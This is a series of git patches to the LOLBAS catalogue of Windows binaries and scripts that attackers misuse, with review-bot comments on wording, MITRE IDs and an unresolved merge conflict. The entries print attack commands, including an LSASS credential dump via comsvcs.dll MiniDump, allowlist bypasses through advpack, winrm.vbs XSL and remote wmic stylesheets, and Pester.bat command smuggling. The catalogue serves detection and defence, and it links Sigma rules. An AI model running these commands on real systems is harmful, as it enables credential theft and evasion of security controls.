 Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
 Usecase: Run local or remote script(let) code through INF file specification.
 Category: AWL Bypass
- Privileges: Admin
+ Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
 - Command: rundll32.exe advpack.dll,RegisterOCX test.dll
diff --git a/yml/OSLibraries/Ieadvpack.yml b/yml/OSLibraries/Ieadvpack.yml
index 631c1f1..5b7c822 100644
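Review bot: The Wmic entry that survives this hunk, `- Command: wmic.exe process get brief /format:"https://.../Wmic_calc.xsl"`, still carries `Description: Create a volume shadow copy of NTDS.dit that can be copied.` and `Usecase: Execute binary on remote system`, which are the lines of the NTDS.dit entry removed just above it; the commit deletes the copy source but leaves the copy-paste error standing, so the remaining XSL entry is mis-described. Something like `Description: Execute arbitrary script code from a (local or remote) XSL stylesheet supplied via the /format switch.` and `Usecase: Execute code via XSL script` would match the command. That entry's `Category` and `MitreID` lines fall outside the hunk; if they still read T1218, note that this same series maps the Winrm XSL usecase to T1220, so the two should probably agree. The Advpack hunk's change of `Privileges: Admin` to `Privileges: User` is a claim about the technique I cannot verify from the diff alone — a Resources link or a sentence in the commit message saying how it was tested would make it auditable.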
--- a/yml/OSLibraries/Ieadvpack.yml
+++ b/yml/OSLibraries/Ieadvpack.yml
@@ -15,7 +15,7 @@ Commands:
 Description: Execute the specified (local or remote) .wsh/.sct script with scrobj.dll in the .inf file by calling an information file directive (DefaultInstall section implied).
 Usecase: Run local or remote script(let) code through INF file specification.
 Category: AWL Bypass
- Privileges: Admin
+ Privileges: User
 MitreID: T1218.011
 OperatingSystem: Windows 10, Windows 11
 - Command: rundll32.exe ieadvpack.dll,RegisterOCX test.dll
diff --git a/yml/OSLibraries/Mshtml.yml b/yml/OSLibraries/Mshtml.yml
index 40850c9..ce0ff3f 100644
--- a/yml/OSLibraries/Mshtml.yml
+++ b/yml/OSLibraries/Mshtml.yml
@@ -5,7 +5,7 @@ Author:
 Created: 2018-05-25
 Commands:
 - Command: rundll32.exe Mshtml.dll,PrintHTML "C:\temp\calc.hta"
- Description: Invoke an HTML Application via mshta.exe (Note - Pops a security warning and a print dialogue box).
+ Description: "Invoke an HTML Application via mshta.exe (note: pops a security warning and a print dialogue box)."
 Usecase: Launch an HTA application.
 Category: Execute
 Privileges: User
diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml
index 7a9c41b..c9082b0 100644
--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
@@ -4,7 +4,7 @@ Description: COM+ Services
 Author:
 Created: 2019-08-30
 Commands:
- - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
+ - Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
 Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
 Usecase: Dump Lsass.exe process memory to retrieve credentials.
 Category: Dump
diff --git a/yml/OSScripts/Syncappvpublishingserver.yml b/yml/OSScripts/Syncappvpublishingserver.yml
index fb6aa06..b8fb730 100644
--- a/yml/OSScripts/Syncappvpublishingserver.yml
+++ b/yml/OSScripts/Syncappvpublishingserver.yml
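Review bot: The rewritten comsvcs command gains a `powershell /c` prefix that plays no part in reaching `rundll32 ... MiniDump` and changes the process tree a detection would key on (powershell → rundll32 instead of whatever shell the operator is already in); a LOLBAS entry should show the minimal invocation, `- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full`. Dropping the quotes around `[LSASS_PID] dump.bin full` is fine as far as I can tell, since rundll32 hands the remainder of the command line to the export as one string, but a line in the commit message saying it was re-tested would help. The unchanged context line has a typo worth fixing while here: `which in turns calls` → `which in turn calls`.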
@@ -10,7 +10,7 @@ Commands:
 Category: Execute
 Privileges: User
 MitreID: T1216
- OperatingSystem: Windows 10
+ OperatingSystem: Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
 Code_Sample:
diff --git a/yml/OSScripts/Winrm.yml b/yml/OSScripts/Winrm.yml
index c108ab3..c661ffb 100644
--- a/yml/OSScripts/Winrm.yml
+++ b/yml/OSScripts/Winrm.yml
@@ -19,11 +19,11 @@ Commands:
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
 - Command: '%SystemDrive%\BypassDir\cscript //nologo %windir%\System32\winrm.vbs get wmicimv2/Win32_Process?Handle=4 -format:pretty'
- Description: Bypass AWL solutions by copying and executing cscript.exe and malicious XSL documents from attacker controlled location
- Usecase: Execute aribtrary, unsigned code via XSL script
+ Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.
+ Usecase: Execute arbitrary, unsigned code via XSL script
 Category: AWL Bypass
 Privileges: User
- MitreID: T1216
+ MitreID: T1220
 OperatingSystem: Windows 10, Windows 11
 Full_Path:
 - Path: C:\Windows\System32\winrm.vbs
From 2b2099837109301e582f4758a3d56734ca2f4eac Mon Sep 17 00:00:00 2001
From: Wietze
Date: Thu, 5 May 2022 11:16:19 +0100
Subject: [PATCH 07/11] Remove redundant powershell command from comsvcs entry
---
 yml/OSLibraries/comsvcs.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSLibraries/comsvcs.yml b/yml/OSLibraries/comsvcs.yml
index c9082b0..2cf0221 100644
--- a/yml/OSLibraries/comsvcs.yml
+++ b/yml/OSLibraries/comsvcs.yml
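Review bot: The new Winrm `Description` mixes a semicolon and a comma inside one enumeration (`...attacker-controlled location; creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs...`); make it `Description: Bypass AWL solutions by copying cscript.exe to an attacker-controlled location, creating a malicious WsmPty.xsl in the same location, and executing winrm.vbs via the relocated cscript.exe.` It would also help a reader to say why the relocation matters — presumably winrm.vbs resolves the `-format:pretty` stylesheet relative to the running cscript.exe, which is what makes the attacker's WsmPty.xsl win — but confirm that against winrm.vbs before stating it. The `MitreID` move from T1216 to T1220 is consistent with the XSL-based usecase, and the `OperatingSystem` context lines suggest the entry was re-validated on Windows 11.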
@@ -4,7 +4,7 @@ Description: COM+ Services
 Author:
 Created: 2019-08-30
 Commands:
- - Command: powershell /c rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
+ - Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump [LSASS_PID] dump.bin full
 Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
 Usecase: Dump Lsass.exe process memory to retrieve credentials.
 Category: Dump
From 400158f2df81279cf245e8ad27f6cadbad5fb347 Mon Sep 17 00:00:00 2001
From: Wietze
Date: Fri, 2 Sep 2022 17:16:58 +0100
Subject: [PATCH 08/11] Add sigma references to CL_LoadAssembly, CLMutexVerifiers entries (#221)
---
 yml/OSScripts/CL_LoadAssembly.yml | 28 ++++++++++++++++++++++++++++
 yml/OSScripts/CL_mutexverifiers.yml | 1 +
 2 files changed, 29 insertions(+)
diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml
index c9ca1ab..5954984 100644
--- a/yml/OSScripts/CL_LoadAssembly.yml
+++ b/yml/OSScripts/CL_LoadAssembly.yml
@@ -1,3 +1,4 @@
+<<<<<<< HEAD
 ---
 Name: CL_LoadAssembly.ps1
 Description: PowerShell Diagnostic Script
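Review bot: The CL_LoadAssembly hunk commits a Git conflict marker as the first line of the file (`+<<<<<<< HEAD`), so `yml/OSScripts/CL_LoadAssembly.yml` no longer begins with its `---` document separator and any YAML consumer will either fail or pick up a stray `<<<<<<< HEAD` scalar document ahead of the real one; the marker must be removed. The diffstat (`28 ++++…`) for a commit whose subject promises only a Sigma reference is the tell that the merge was left unresolved — the `=======` / `>>>>>>>` half lands in this file's second hunk. The intended change is a single `  - Sigma: …proc_creation_win_lolbas_cl_loadassembly.yml` line under the existing `Detection:` list, exactly like the CL_mutexverifiers hunk in this same commit. The comsvcs hunk above it is fine; the unchanged `which in turns calls` in its context line could become `which in turn calls` while the file is being touched.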
@@ -22,3 +23,30 @@ Acknowledgement:
 - Person: Jimmy
 Handle: '@bohops'
 ---
+=======
+---
+Name: CL_LoadAssembly.ps1
+Description: PowerShell Diagnostic Script
+Author: Jimmy (@bohops)
+Created: 2021-09-26
+Commands:
+ - Command: 'powershell.exe -ep bypass -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()"'
+ Description: Proxy execute Managed DLL with PowerShell
+ Usecase: Execute proxied payload with Microsoft signed binary
+ Category: Execute
+ Privileges: User
+ MitreID: T1216
+ OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
+Full_Path:
+ - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1
+Code_Sample:
+ - Code:
+Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml
+Resources:
+ - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/
+Acknowledgement:
+ - Person: Jimmy
+ Handle: '@bohops'
+---
+>>>>>>> 9135005 (Add sigma references to CL_LoadAssembly, CLMutexVerifiers entries (#221))
diff --git a/yml/OSScripts/CL_mutexverifiers.yml b/yml/OSScripts/CL_mutexverifiers.yml
index 3f8748e..5877b72 100644
--- a/yml/OSScripts/CL_mutexverifiers.yml
+++ b/yml/OSScripts/CL_mutexverifiers.yml
@@ -20,6 +20,7 @@ Full_Path:
 Code_Sample:
 - Code:
 Detection:
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_mutexverifiers.yml
 Resources:
 - Link: https://twitter.com/pabraeken/status/995111125447577600
 Acknowledgement:
From 4b99cadd85ddec827fa4420a1171dc6b9fece324 Mon Sep 17 00:00:00 2001
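Review bot: The entire added block in the CL_LoadAssembly hunk is the unresolved other side of a merge conflict, from `+=======` through `+>>>>>>> 9135005 (Add sigma references …)`, and it duplicates the whole CL_LoadAssembly document that already precedes it; the only line that carries the commit's intent is the Sigma reference. Resolve it by dropping both markers and the duplicate document and adding just `  - Sigma: https://github.com/SigmaHQ/sigma/blob/ff6c54ded6b52f379cec11fe17c1ccb956faa660/rules/windows/process_creation/proc_creation_win_lolbas_cl_loadassembly.yml` under the existing document's `Detection:` list, which presumably sits above this hunk. The `>>>>>>> …` line is very likely a hard YAML parse error on its own, since `>` introduces a folded block scalar and the rest of the line is not a valid header, so the file as committed probably breaks whatever builds the site from these entries. The CL_mutexverifiers hunk in this same commit is the shape this change should have had.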
From: Oddvar Moe
Date: Tue, 23 Aug 2022 15:44:57 +0200
Subject: [PATCH 09/11] Update pester.bat with an additional example
---
 yml/OSScripts/pester.yml | 10 ++++++++++
 1 file changed, 10 insertions(+)
diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml
index 842c3b3..ba5980f 100644
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@@ -11,6 +11,13 @@ Commands:
 Privileges: User
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
+ - Command: Pester.bat ;calc.exe
+ Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad
+ Usecase: Proxy execution
+ Category: Execute
+ Privileges: User
+ MitreID: T1216
+ OperatingSystem: Windows 10, Windows 11
 Full_Path:
 - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\bin\Pester.bat
 - Path: c:\Program Files\WindowsPowerShell\Modules\Pester\*\bin\Pester.bat
@@ -20,7 +27,10 @@ Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml
 Resources:
 - Link: https://twitter.com/Oddvarmoe/status/993383596244258816
+ - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378
 Acknowledgement:
 - Person: Emin Atac
 Handle: '@p0w3rsh3ll'
+ - Person: Stamatis Chatzimangou
+ Handle: '@_st0pp3r_'
 ---
From 5a38aa722f7596ed8b5896fff9360f0451af7bf9 Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Tue, 23 Aug 2022 15:47:17 +0200
Subject: [PATCH 10/11] Adjusted comment in command
---
 yml/OSScripts/pester.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml
index ba5980f..38a15ca 100644
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
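Review bot: The new Pester entry's `Description` ends with `Example here executes notepad` while its `Command` is `Pester.bat ;calc.exe`; the two have to agree (`Example here executes calc.exe`). The sentences `The third parameter can be anything. The fourth is the payload.` also describe a multi-argument form that the single `;calc.exe` argument does not show, so either give that form as the command or drop the sentences. A reader would be better served by one sentence on the mechanism — presumably the leading `;` closes the Invoke-Pester statement inside the PowerShell command line that Pester.bat assembles from `%*`, so whatever follows runs as a second PowerShell statement — but check that against the batch file before stating it, since nothing in the hunk shows how Pester.bat builds its command.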
@@ -12,7 +12,7 @@ Commands:
 MitreID: T1216
 OperatingSystem: Windows 10, Windows 11
 - Command: Pester.bat ;calc.exe
- Description: Execute code using Pester. The third parameter can be anything. The fourth is the payload. Example here executes notepad
+ Description: Execute code using Pester. Example here executes calc.exe
 Usecase: Proxy execution
 Category: Execute
 Privileges: User
From c5c227a7ba7ff33556645e7e335a0b0931165c5f Mon Sep 17 00:00:00 2001
From: Oddvar Moe
Date: Wed, 24 Aug 2022 12:32:48 +0200
Subject: [PATCH 11/11] added sigma detection for pester
---
 yml/OSScripts/pester.yml | 1 +
 1 file changed, 1 insertion(+)
diff --git a/yml/OSScripts/pester.yml b/yml/OSScripts/pester.yml
index 38a15ca..7d85b52 100644
--- a/yml/OSScripts/pester.yml
+++ b/yml/OSScripts/pester.yml
@@ -25,6 +25,7 @@ Code_Sample:
 - Code:
 Detection:
 - Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_pester.yml
+ - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml
 Resources:
 - Link: https://twitter.com/Oddvarmoe/status/993383596244258816
 - Link: https://twitter.com/_st0pp3r_/status/1560072680887525378
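Review bot: The new `Detection` reference is linked through `blob/master/` (`+ - Sigma: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/proc_creation_win_susp_pester_parent.yml`), while the existing entry directly above it and every other Sigma link in this series pin a commit hash; SigmaHQ renames and relocates rules regularly, so a master link will eventually 404 and readers cannot tell which revision of the rule the entry was checked against. Replace `master` with the hash of the commit that introduced `proc_creation_win_susp_pester_parent.yml`, matching the pinned form of the line above. The Pester description fix in the earlier hunk (`Example here executes calc.exe`) now matches the command, which closes the mismatch introduced two commits back.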